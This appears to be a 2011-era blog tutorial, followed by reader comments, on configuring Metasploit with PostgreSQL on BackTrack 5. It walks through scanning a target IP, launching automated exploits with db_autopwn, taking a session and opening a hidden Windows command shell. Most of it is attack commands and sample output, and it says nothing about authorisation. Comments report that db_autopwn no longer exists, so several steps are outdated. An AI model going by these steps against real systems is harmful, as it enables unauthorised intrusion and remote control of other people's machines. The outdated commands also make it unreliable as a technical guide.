In this tutorial we will take a look how we can configure metasploit to launch an automated attack on a target system using a backtrack 5 machine, for this we will need just Backtrack 5 which is available freely for download from
here. You can install backtrack 5 on VM-ware or by booting it via live CD or live USB or by installing it on you hard disk.
Once you done installing it, a console will appear like this
root@root:~#
if you want to go to GUI mode type
root@root:~# startx
if you are in GUI mode open the console and start typing the following command as it is, line by line, and install software if prompted...
root@root:~# apt-get install postgresql
root@root:~# sudo apt-get install libpgsql-ruby
root@root:~# sudo su postgres
sh-4.1$ createuser jinni -P
could not change directory to "/root"
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
sh-4.1$ createdb --owner=root metasploitdb
could not change directory to "/root"
exit
sh-4.1$ exit
exit
root@root:~# msfconsole
msf > db_driver postgresql
[*] Using database driver postgresql
msf > db_connect jinni:tutorial@127.0.0.1:5432/metasploitdb
db_workspace -a tutorialjinni
[*] Added workspace: MyProject
msf > db_nmap 192.168.2.11 -sS -O
[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-05-18 18:27 PST
[*] Nmap: Nmap scan report for . . .
// ...
// NMAP results will be displayed here ...
// ...
// after NMAP finishes
// we are ready for launching exploits
msf > db_autopwn -p -e -q
[*] (30/300 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.2.11:135
// exploits will launch when an exploit is successful
// it will show you open sessions like (30/300 [3 sessions]):
to list all open session use command
session -l
to select any session you the command
session -i 3
// 3 is session number
if the target system is windows, as mine was window server 2000 get the command shell by issuing command
execute -f cmd.exe -i -H
hope this help... i tested it myself.
Reference
sh-4.1$ createdb --owner=root metasploitdb
ReplyDeletecreatedb: datbase creation failed: ERROR: role "root" does not exist
This will happen if the administrator has not created a PostgreSQL user account for you. (PostgreSQL user accounts are distinct from operating system user accounts.)
ReplyDeletereference: http://www.postgresql.org/docs/8.4/interactive/tutorial-createdb.html
hope that helps
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 7.31 seconds
ReplyDeletemsf > db_autopwn -p -e -q
[-] Unknown command: db_autopwn.
i hate backtrack 5
atabase Backend Commands
ReplyDelete=========================
Command Description
------- -----------
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_driver Specify a database driver
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
msf >
UNKNOW db_autopwn
backtrack 5?
this needs to be updated
ReplyDeletei got it to work but it also needs updated!
Thanks!!
How did you fix it? @ Anonymous
ReplyDelete